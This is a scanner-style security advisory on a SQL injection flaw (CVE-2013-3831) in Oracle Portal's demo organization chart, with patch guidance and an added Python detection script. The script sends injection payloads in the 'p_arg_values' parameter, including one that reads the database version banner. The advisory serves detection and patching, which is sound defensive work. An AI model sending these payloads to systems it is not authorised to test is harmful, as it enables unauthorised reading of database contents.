Summary
This host is running the Oracle Portal Demo Organization Chart and is prone to a SQL injection vulnerability.
Impact
Successful exploitation allows remote attackers to inject arbitrary SQL into queries the portal runs against its backend database and thereby read or manipulate database information.
Impact Level: Application
Solution
Apply the patch referenced in the Oracle Critical Patch Update Advisory for October 2013:
http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
Insight
Input passed via the 'p_arg_values' parameter to /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW is not properly sanitized before being used in a SQL query.
Affected
Oracle Portal version 11.1.1.6.0 and prior.
Detection
Sends a crafted HTTP GET request with a SQL injection string in the 'p_arg_values' parameter and checks whether the response reveals database information.
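The following is an added example of how the check described above can be carried out; it is not the scanner's own detection code and not code from Oracle. It assumes that the org-chart demo pairs each 'p_arg_values' entry with a 'p_arg_names' entry (the name 'p_mgr_name' is an assumption), uses a generic Oracle string-concatenation probe to surface the version banner, and classifies responses by comparing them against a baseline request. The sample responses are constructed, not captured from a real server.

```python
import re
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Path and parameter named in the advisory.
VULN_PATH = "/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW"
# Assumed companion parameter: the org-chart demo pairs each p_arg_values
# entry with a p_arg_names entry. The name used here is an assumption.
ASSUMED_ARG_NAME = "p_mgr_name"

# An unbalanced quote in a dynamically built query surfaces as an ORA-nnnnn error.
ORA_ERROR = re.compile(r"\bORA-\d{5}\b")
# Evidence that the injected query read database information (a version banner).
DB_BANNER = re.compile(r"Oracle Database \d+[A-Za-z]*")

# Probe values. The first breaks the quoted string; the second is a generic
# Oracle string-concatenation payload (an assumption, not the scanner's own
# string) that splices the version banner into the page when the value is
# concatenated unescaped into a query.
QUOTE_PROBE = "x'"
BANNER_PROBE = "x'||(select banner from v$version where rownum=1)||'"


def build_probe_url(base_url: str, value: str) -> str:
    """Build the GET request URL carrying `value` in p_arg_values."""
    query = urlencode({"p_arg_names": ASSUMED_ARG_NAME, "p_arg_values": value})
    return base_url.rstrip("/") + VULN_PATH + "?" + query


def classify(baseline_body: str, probe_body: str) -> tuple:
    """Compare the benign response with the probe response.

    Returns ("vulnerable", evidence) when the probe response shows an Oracle
    error or a database banner that the baseline response does not, otherwise
    ("not_detected", None). Comparing against a baseline avoids flagging pages
    that always print an error or a banner.
    """
    err = ORA_ERROR.search(probe_body)
    if err and not ORA_ERROR.search(baseline_body):
        return ("vulnerable", err.group(0))
    banner = DB_BANNER.search(probe_body)
    if banner and not DB_BANNER.search(baseline_body):
        return ("vulnerable", banner.group(0))
    return ("not_detected", None)


def fetch(url: str, timeout: float = 10.0) -> str:
    """GET `url`; error responses (e.g. HTTP 500 from the PL/SQL gateway) are returned too."""
    req = Request(url, headers={"User-Agent": "org-chart-sqli-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except HTTPError as exc:
        return exc.read().decode("utf-8", "replace")


def check_host(base_url: str) -> tuple:
    """Run both probes against a live host (needs network; the offline sample below does not use it)."""
    baseline = fetch(build_probe_url(base_url, "x"))
    for probe in (QUOTE_PROBE, BANNER_PROBE):
        verdict = classify(baseline, fetch(build_probe_url(base_url, probe)))
        if verdict[0] == "vulnerable":
            return verdict
    return ("not_detected", None)


# Constructed sample responses (not captured from a real server) so the
# classifier can be exercised without network access.
SAMPLE_BASELINE = "<html><body><table><tr><td>x</td></tr></table></body></html>"
SAMPLE_QUOTE_RESPONSE = "<html><body>ORA-01756: quoted string not properly terminated</body></html>"
SAMPLE_BANNER_RESPONSE = (
    "<html><body><table><tr><td>x"
    "Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production"
    "</td></tr></table></body></html>"
)

if __name__ == "__main__":
    print(build_probe_url("http://portal.example", QUOTE_PROBE))
    print(classify(SAMPLE_BASELINE, SAMPLE_QUOTE_RESPONSE))
    print(classify(SAMPLE_BASELINE, SAMPLE_BANNER_RESPONSE))
    print(classify(SAMPLE_BASELINE, SAMPLE_BASELINE))
```

The baseline comparison is the part worth keeping in any real check: a portal page that always prints an ORA- error or a banner would otherwise produce a false positive. Since the CVSS vector lists Au:S, a live run would also need a valid portal session cookie in the request headers.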
References
http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
Severity
CVSS Base Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N)
Classification
CVE: CVE-2013-3831